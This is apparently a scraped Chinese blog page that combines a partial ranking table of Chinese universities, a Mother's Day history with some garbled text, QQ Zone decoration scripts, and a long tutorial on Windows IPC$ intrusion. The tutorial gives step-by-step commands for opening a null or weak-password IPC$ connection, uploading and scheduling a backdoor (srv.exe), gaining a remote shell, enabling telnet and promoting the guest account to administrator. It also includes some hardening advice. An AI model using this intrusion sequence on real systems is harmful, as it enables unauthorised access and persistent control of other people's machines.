| 42 | 武汉理工大学 | 27.65 | 16 | 5.75 | 10.57 | 11.3 | 9.51 | 1.92 | 鄂 | 4 | 理工 | 文理类 | 研教型 |
| 43 | 北京科技大学 | 27.41 | 13 | 7.73 | 5.14 | 14.5 | 14.11 | 0.55 | 京 | 10 | 理工 | 工学类 | 研教型 |
| 44 | 南京航空航天大学 | 26.72 | 14 | 6.97 | 6.84 | 12.9 | 12.37 | 0.66 | 苏 | 5 | 理工 | 工学类 | 研教型 |
| 45 | 南京农业大学 | 26.36 | 13 | 6.43 | 6.25 | 13.7 | 11.8 | 2 | 苏 | 6 | 农林 | 理科类 | 研教型 |
| 46 | 西安电子科技大学 | 26.31 | 13 | 6.87 | 6.12 | 13.3 | 13.12 | 0.32 | 陕 | 3 | 理工 | 工学类 | 研教型 |
| 47 | 西北大学 | 26.3 | 13 | 6.37 | 6.43 | 13.5 | 9.9 | 3.72 | 陕 | 4 | 综合 | 综合类 | 研教型 |
| 48 | 暨南大学 | 26.26 | 11 | 7.27 | 3.86 | 15.1 | 7.6 | 7.68 | 粤 | 3 | 综合 | 综合类 | 研教型 |
| 49 | 电子科技大学 | 25.56 | 14 | 5.67 | 8.35 | 11.5 | 10.77 | 0.87 | 川 | 2 | 理工 | 工学类 | 研教型 |
| 50 | 南京理工大学 | 25.45 | 13 | 5.76 | 7.73 | 12 | 11.15 | 0.92 | 苏 | 7 | 理工 | 工学类 | 研教型 |
| 51 | 西南大学 | 25.42 | 15 | 4.7 | 10.67 | 10.1 | 6.68 | 3.46 | 渝 | 2 | 综合 | 综合类 | 研教型 |
| 52 | 西北农林科技大学 | 24.85 | 12 | 6.42 | 5.71 | 12.7 | 12.33 | 0.5 | 陕 | 5 | 农林 | 理科类 | 研教型 |
| 53 | 南京师范大学 | 24.72 | 13 | 5.99 | 6.93 | 11.8 | 4.87 | 7.04 | 苏 | 8 | 师范 | 文理类 | 研教型 |
| 54 | 上海大学 | 24.08 | 13 | 5.74 | 6.98 | 11.4 | 8.15 | 3.31 | 沪 | 6 | 综合 | 文理类 | 研教型 |
| 55 | 西南交通大学 | 21.91 | 12 | 5.08 | 6.91 | 9.92 | 8.36 | 1.65 | 川 | 3 | 理工 | 文理类 | 研教型 |
| 56 | 华中农业大学 | 21.28 | 11 | 4.98 | 6.36 | 9.95 | 8.86 | 1.18 | 鄂 | 5 | 农林 | 理科类 | 研教型 |
| 57 | 华中师范大学 | 21.05 | 11 | 5.19 | 5.82 | 10 | 3.48 | 6.64 | 鄂 | 6 | 师范 | 文理类 | 研教型 |
| 58 | 东北师范大学 | 20.98 | 11 | 5.12 | 5.67 | 10.2 | 6.82 | 3.46 | 吉 | 2 | 师范 | 文理类 | 研教型 |
| 59 | 中国海洋大学 | 20.83 | 9.3 | 5.9 | 3.36 | 11.6 | 10.54 | 1.13 | 鲁 | 2 | 综合 | 理科类 | 研教型 |
| 60 | 扬州大学 | 19.86 | 12 | 3.46 | 8.06 | 8.34 | 6.78 | 1.64 | 苏 | 9 | 综合 | 综合类 | 研教型 |
| 61 | 华南师范大学 | 18.5 | 9.5 | 4.39 | 5.11 | 9 | 3.79 | 5.3 | 粤 | 4 | 师范 | 文理类 | 研教型 |
| 62 | 华南农业大学 | 18.05 | 9.7 | 3.95 | 5.74 | 8.36 | 7.86 | 0.58 | 粤 | 5 | 农林 | 理科类 | 研教型 |
| 63 | 首都医科大学 | 17.69 | 6.8 | 5.91 | 0.91 | 10.9 | 10.87 | 0.08 | 京 | 11 | 医药 | 医学类 | 研教型 |
| 64 | 山西大学 | 17.55 | 9.1 | 3.96 | 5.13 | 8.46 | 5 | 3.54 | 晋 | 1 | 综合 | 综合类 | 研教型 |
| 65 | 湖南师范大学 | 17.55 | 9.8 | 3.65 | 6.19 | 7.72 | 3.81 | 3.98 | 湘 | 3 | 师范 | 文理类 | 研教型 |
| 66 | 北京化工大学 | 17.39 | 8.1 | 4.58 | 3.56 | 9.25 | 9.06 | 0.28 | 京 | 12 | 理工 | 工学类 | 研教型 |
| 67 | 中国医科大学 | 17.08 | 7.7 | 5.16 | 2.57 | 9.35 | 9.39 | 0.05 | 辽 | 3 | 医药 | 医学类 | 研教型 |
| 68 | 南昌大学 | 16.58 | 12 | 1.84 | 10.63 | 4.11 | 3.69 | 0.45 | 赣 | 1 | 综合 | 文理类 | 教研型 |
| 69 | 河海大学 | 16.53 | 9.7 | 3.5 | 6.25 | 6.79 | 6.03 | 0.82 | 苏 | 10 | 理工 | 工学类 | 研教型 |
| 70 | 北京交通大学 | 16.49 | 8.2 | 4.46 | 3.76 | 8.27 | 7.4 | 0.94 | 京 | 13 | 理工 | 工学类 | 研教型 |
| 71 | 陕西师范大学 | 16.49 | 8.2 | 4.16 | 4.03 | 8.3 | 4.43 | 3.94 | 陕 | 6 | 师范 | 综合类 | 研教型 |
| 72 | 云南大学 | 16.09 | 9.3 | 3.3 | 6.01 | 6.77 | 4.53 | 2.3 | 滇 | 1 | 综合 | 文理类 | 研教型 |
| 73 | 福建农林大学 | 15.51 | 7.9 | 3.05 | 4.81 | 7.65 | 7.44 | 0.28 | 闽 | 2 | 农林 | 农学类 | 研教型 |
| 74 | 北京工业大学 | 15.44 | 7.5 | 4.27 | 3.21 | 7.96 | 7.5 | 0.53 | 京 | 14 | 理工 | 工学类 | 研教型 |
| 75 | 南京工业大学 | 15.4 | 10 | 2.44 | 7.66 | 5.3 | 5.14 | 0.22 | 苏 | 11 | 理工 | 工学类 | 研教型 |
| 76 | 山东农业大学 | 15.34 | 8.9 | 3 | 5.94 | 6.4 | 5.85 | 0.61 | 鲁 | 3 | 农林 | 农学类 | 研教型 |
| 77 | 东华大学 | 15.24 | 8.8 | 3.25 | 5.53 | 6.46 | 6.13 | 0.39 | 沪 | 7 | 理工 | 工学类 | 研教型 |
| 78 | 哈尔滨工程大学 | 15.19 | 8.6 | 3.41 | 5.21 | 6.56 | 5.99 | 0.63 | 黑 | 2 | 理工 | 工学类 | 研教型 |
| 79 | 福州大学 | 15.1 | 8.8 | 3.03 | 5.72 | 6.35 | 5.45 | 0.96 | 闽 | 3 | 理工 | 工学类 | 研教型 |
| 80 | 中南财经政法大学 | 15.06 | 8.9 | 3.1 | 5.77 | 6.19 | 0.04 | 6.21 | 鄂 | 7 | 财经 | 文科类 | 研教型 |
| 81 | 河北大学 | 14.81 | 9.5 | 2.21 | 7.23 | 5.36 | 2.78 | 2.64 | 冀 | 1 | 综合 | 综合类 | 研教型 |
| 82 | 燕山大学 | 14.72 | 9.4 | 2.53 | 6.85 | 5.34 | 5.2 | 0.2 | 冀 | 2 | 理工 | 工学类 | 研教型 |
| 83 | 江苏大学 | 13.69 | 9.1 | 2.27 | 6.8 | 4.61 | 3.91 | 0.73 | 苏 | 12 | 综合 | 工学类 | 研教型 |
| 84 | 上海财经大学 | 13.65 | 6.6 | 3.56 | 3.07 | 7.03 | 0.08 | 7.02 | 沪 | 8 | 财经 | 文科类 | 研教型 |
| 85 | 北京邮电大学 | 13.61 | 7.2 | 3.22 | 3.95 | 6.43 | 6.22 | 0.27 | 京 | 15 | 理工 | 工学类 | 研教型 |
| 86 | 合肥工业大学 | 13.61 | 8.5 | 2.41 | 6.05 | 5.15 | 4.66 | 0.55 | 皖 | 2 | 理工 | 工学类 | 研教型 |
| 87 | 河南大学 | 13.41 | 8.7 | 1.81 | 6.87 | 4.72 | 2 | 2.75 | 豫 | 2 | 综合 | 文理类 | 研教型 |
| 88 | 贵州大学 | 12.86 | 11 | 0.86 | 9.64 | 2.36 | 2.05 | 0.33 | 黔 | 1 | 综合 | 理科类 | 教研型 |
| 89 | 太原理工大学 | 12.83 | 8 | 2.3 | 5.74 | 4.79 | 4.68 | 0.14 | 晋 | 2 | 理工 | 工学类 | 研教型 |
| 90 | 湘潭大学 | 12.63 | 8.5 | 1.94 | 6.54 | 4.15 | 2.81 | 1.37 | 湘 | 4 | 综合 | 综合类 | 研教型 |
| 91 | 浙江工业大学 | 12.54 | 7.9 | 1.91 | 6.03 | 4.6 | 4 | 0.63 | 浙 | 2 | 理工 | 工学类 | 研教型 |
| 92 | 青岛大学 | 12.51 | 8.6 | 1.53 | 7.03 | 3.96 | 3.07 | 0.92 | 鲁 | 4 | 综合 | 综合类 | 教研型 |
| 93 | 成都理工大学 | 12.46 | 8.6 | 1.68 | 6.88 | 3.91 | 3.75 | 0.19 | 川 | 4 | 理工 | 综合类 | 教研型 |
| 94 | 江南大学 | 12.4 | 8.2 | 1.93 | 6.25 | 4.23 | 3.83 | 0.43 | 苏 | 13 | 综合 | 工学类 | 研教型 |
| 95 | 昆明理工大学 | 12.38 | 7.9 | 2.17 | 5.76 | 4.45 | 4.16 | 0.32 | 滇 | 2 | 理工 | 工学类 | 研教型 |
| 96 | 中国药科大学 | 12.17 | 5 | 2.67 | 2.3 | 7.2 | 7.17 | 0.1 | 苏 | 14 | 医药 | 医学类 | 研教型 |
| 97 | 山东师范大学 | 12 | 7.6 | 1.99 | 5.6 | 4.41 | 2.67 | 1.77 | 鲁 | 5 | 师范 | 文理类 | 研教型 |
| 98 | 北京林业大学 | 11.95 | 6.8 | 2.62 | 4.14 | 5.19 | 5 | 0.25 | 京 | 16 | 林业 | 理科类 | 研教型 |
| 99 | 河北工业大学 | 11.94 | 7.7 | 1.81 | 5.9 | 4.22 | 4.1 | 0.15 | 冀 | 3 | 理工 | 工学类 | 研教型 |
| 100 | 华北电力大学 | 11.85 | 7.5 | 1.8 | 5.73 | 4.31 | 4.14 | 0.2 | 冀 | 4 | 理工 | 工学类 | 研教型 |
IPC$详细介绍
(作者置顶)
| 一网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2004年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 : 原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了. 六 如何打开目标的IPC$(此段引自相关文章) 首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。 七 如何防范ipc$入侵 1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3)停止server服务 net stop server /y (重新启动后server服务会重新开启) 4)修改注册表 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。 pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用 4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师 5设置复杂密码,防止通过ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP 盘符 $访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) 十 总结: 关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论. 最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,希望大家慎重`太子把这些做出来`呵呵`其实我也是在学`天亮了`累了 `大家开心 | |
母亲节
(作者置顶)
母亲节的由来
母亲节起源于希腊,古希腊人在这一天向希腊神话中的众神之母赫拉致敬。在17世纪中叶,母亲节流传到英国,英国人把封斋期的第四个星期天作为母亲节。在这一天里,出门在外的年青人将回到家中,给他们的母亲带上一些小礼物。
现代意义上的母亲节起源于美国,由AmanmJarvis(1864-1948)发起,她终身未婚,一直陪伴在她母亲身边。1905年在母亲去世时,Amanm悲痛欲绝。两年后(1907年),Amanm和她的朋友开始写信给有影响的部长、商人、议员来寻求支持,以便让母亲节成为一个法定的节日。Amanm认为子女经常忽视了对母亲的感情,她希望母亲节能够让人多想一想母亲为家庭所付出的一切。第一个母亲节于1908年5月10日在西弗吉尼亚州和宾夕法尼亚州举行,在这次节日里,康乃磬被选中为献给母亲的花,并以此流传下来。1913年,美国国会通过了一份议案,将每年5月的第二个星期天作为法定的母亲节。母亲节从此流传开来!
母亲节创立后,得到了全世界各国人民的支持。AmanmJarvis在世时,设立母亲节的国家已达43个。时至今日,欢庆这个节日的国家就更多了。母亲节,已经成了一个名副其实的国际性节日。按惯例,“国际母亲凇北欢ㄔ诿磕甑?月11日举行。虽然,有一些国家是在一年中不同的时节庆祝属于他们的母亲节,然而,包括我国在内的多数国家,如丹麦、芬兰、意大利、土耳其、澳大利亚和比利时等等,都是在5月的第二个星期日庆祝母亲节的。
英国母亲节的发展
十七世纪英格兰,为表达对英国母亲们的敬意,乃订四旬斋的第四个星期日为「Mothering Sunday」,人们在这一天回家探视双亲,并致礼表示敬意。(注:四旬斋是指复活节前夕之前,星期天除外的40天)。
当时,有许多的穷人必须在有钱人家里帮 讨生活,而被迫离家寄宿在主人家里,在Mothering Sunday这一天,主人们会放他们假,并鼓励他们返家与妈妈团聚。为增加欢乐气氛,也发展了一种特别的蛋糕称为-mothering cake。
随着基督神在欧洲的扩散,这个节日转为对「Mother Church」的崇敬:表达人们对赋予他们生命、保护他们免於伤害的精神力量的感谢。从此,教会的仪式便与母亲节的庆祝活动相结合,以同时传达人们对母亲与教会的感念。
美国母亲节的发展
在美国,最早关於母亲节的记载是1872年由茱丽雅(Julia Ward Howe即The Battle Hymn of the Republic的作者)所提出的,她建议将这一天献给「和平」,并在波斯顿等地举行母亲节的集会。
1907年,费城的安娜 (Ana Jarvis)为了发起订立全国性的母亲节而活动。她说服了她母亲所属的、位於西维琴尼亚州的教会,在她母亲逝世二周年的忌日~即五月的第二个星期天,举办母亲节庆祝活动。隔年,费城人也开始在同一天庆祝母亲节。
之後,安娜和支持者们开始写信给部长、企业家和政治家,要求订立全国性的母亲节,他们很成功的被接受了,因为1911年时,几乎所有的州都已开始庆祝母亲节了。威尔生总统 (President Woodrow Wilson)亦於1914年发表官方声言,让母亲节成为全国性的节日,就是每年五月的第二个礼拜天这一天。
全世界的母亲节
虽然,许多国家是在一年中不同的时节庆祝属於他们的母亲节。然而,多数国家如丹麦、芬兰、意大利、土耳其和比利时,都是在五月的第二个星期日庆祝母亲节的。
History of Mother′s Day
In the U.S. Mothers' Day is a holiday celebrated on second Sunday in May. It is a day when children honor their mothers with cards, gifts, and flowers. First observance in Philadelphia, Pa. in 1907, it is based on suggestions by Julia Ward Howe in 1872 and by Anna Jarvis in 1907.
Although it wasn't celebrated in the U.S. until 1907, there were days honoring mothers even in the days of ancient Greece. In those days, however, it was Rhea, the Mother of the gods that was given honor.
Later, in the 1600's, in England there was an annual observance called "Mothering Sunday." It was celebrated during June, on the fourth Sunday. On Mothering Sunday, the servants, who generally lived with their employers, were encouraged to return home and honor their mothers. It was traditional for them to bring a special cake along to celebrate the occasion.
In the U.S., in 1907 Ana Jarvis, from Philadelphia, began a campaign to establish a national Mother's Day. Jarvis persuaded her mother's church in Grafton, West Virginia to celebrate Mother's Day on the second anniversary of her mother's death, the 2nd Sunday of May. The next year Mother's Day was also celebrated in Philadelphia.
Jarvis and others began a letter-writing campaign to ministers, businessmen, and politicians in their quest to establish a national Mother's Day. They were successful. President Woodrow Wilson, in 1914, made the official announcement proclaiming Mother's Day a national observance that was to be held each year on the 2nd Sunday of May.
Many other countries of the world celebrate their own Mother's Day at different times throughout the year. Denmark, Finland, Italy, Turkey, Australia, and Belgium celebrate Mother's Day on the second Sunday in May, as in the U.S.
在美国,人们在五月的第二个星期天庆祝母亲节。在这一天,孩子们把卡片,礼物和鲜花献给他们的母亲。第一次庆祝母亲节是发生在1907 年的费城,是由朱莉娅·瓦德·豪和安妮塔·贾威斯分别在 1872 年和 1907 年提议设立的。
虽然美国直到 1907 年才庆祝母亲节,但是尊敬母亲的节日甚至可以追溯到古希腊。尽管那时人们是庆祝上帝的母亲罗伊的。
后来, 在17世纪初的英格兰,人们有一个惯例,就是在每年六月的第四个星期天庆祝“省亲节”。在省亲节那一天, 通常与雇主住在一起的仆人了, 被劝说回家和他们的母亲团聚。按照惯例,他们要带一块特殊的蛋糕回家庆祝。
在美国, 1907年有一个来自费城的叫阿纳·贾维斯的人,发起了一场建立全国的母亲节的运动。在西弗吉尼亚的格拉夫顿,贾维斯说服了她母亲的教堂,在她母亲去世2周年的纪念日那一天庆祝母亲节,即五月的第二个星期天。下一年费城也庆祝了母亲节。
贾维斯和其它人开始给部长,商人,以及政治家们写信,要求建立全国性的母亲节。他们取得了成功。1914年在任的伍德罗·威尔森总统,向全国发布官方通告,宣布在每年五月的第二个星期天庆祝母亲节,并使之成为一种传统。
世界上许多其它国家在全年的不同时间庆祝他们自己的母亲节。丹麦,芬兰,意大利,土耳其,澳大利亚,以及比利时同美国一样,在五月的第二个星期天庆祝母亲节。
微软---MS典型漏洞分析33个
(作者置顶)
黑客网址大全
(作者置顶)
最新高校BT经典100句之威力加强版
(作者置顶)
QQ空间代码
(作者置顶)
漂浮物
(作者置顶)
<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3665_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/222_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/2818_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
<img src="javascript:var num=4;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3070_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
<img src="javascript:var num=5;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3499_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
<img src="javascript:var num=4;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3671_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">
导航标
(作者置顶)
JAY导航标 <img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'/Files/flash/jay.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave- flash\'></div>';"> /Files/qqkj/flash/2.swf /Files/qqkj/flash/3.swf /Files/qqkj/flash/4.swf /Files/qqkj/flash/5.swf /Files/qqkj/flash/6.swf /Files/qqkj/flash/7.swf /Files/qqkj/flash/8.swf /Files/qqkj/flash/9.swf /Files/qqkj/flash/10.swf /Files/qqkj/flash/11.swf /Files/qqkj/flash/12.swf /Files/qqkj/flash/13.swf /Files/qqkj/flash/14.swf /Files/qqkj/flash/15.swf /Files/qqkj/flash/16.swf /Files/qqkj/flash/17.swf /Files/qqkj/flash/18.swf /Files/qqkj/flash/19.swf /Files/qqkj/flash/20.swf /Files/qqkj/flash/21.swf /Files/qqkj/flash/22.swf /Files/qqkj/flash/23.swf /Files/qqkj/flash/24.swf /Files/qqkj/flash/25.swf /Files/qqkj/flash/26.swf /Files/qqkj/flash/27.swf /Files/qqkj/flash/28.swf /Files/qqkj/flash/29.swf http://815668.5151j.cn/qzone/1.swf http://815668.5151j.cn/qzone/2.swf http://815668.5151j.cn/qzone/3.swf http://815668.5151j.cn/qzone/4.swf http://815668.5151j.cn/qzone/5.swf http://815668.5151j.cn/qzone/6.swf http://815668.5151j.cn/qzone/7.swf http://815668.5151j.cn/qzone/8.swf http://815668.5151j.cn/qzone/9.swf http://815668.5151j.cn/qzone/10.swf http://815668.5151j.cn/qzone/11.swf http://815668.5151j.cn/qzone/12.swf http://815668.5151j.cn/qzone/13.swf http://815668.5151j.cn/qzone/14.swf http://815668.5151j.cn/qzone/15.swf http://815668.5151j.cn/qzone/16.swf http://815668.5151j.cn/qzone/17.swf http://815668.5151j.cn/qzone/18.swf www.aiqqpk.56.com http://815668.5151j.cn/qzone/19.swf http://815668.5151j.cn/qzone/20.swf http://815668.5151j.cn/qzone/21.swf http://815668.5151j.cn/qzone/22.swf http://815668.5151j.cn/qzone/23.swf http://815668.5151j.cn/qzone/24.swf http://815668.5151j.cn/qzone/25.swf http://815668.5151j.cn/qzone/26.swf http://815668.5151j.cn/qzone/27.swf 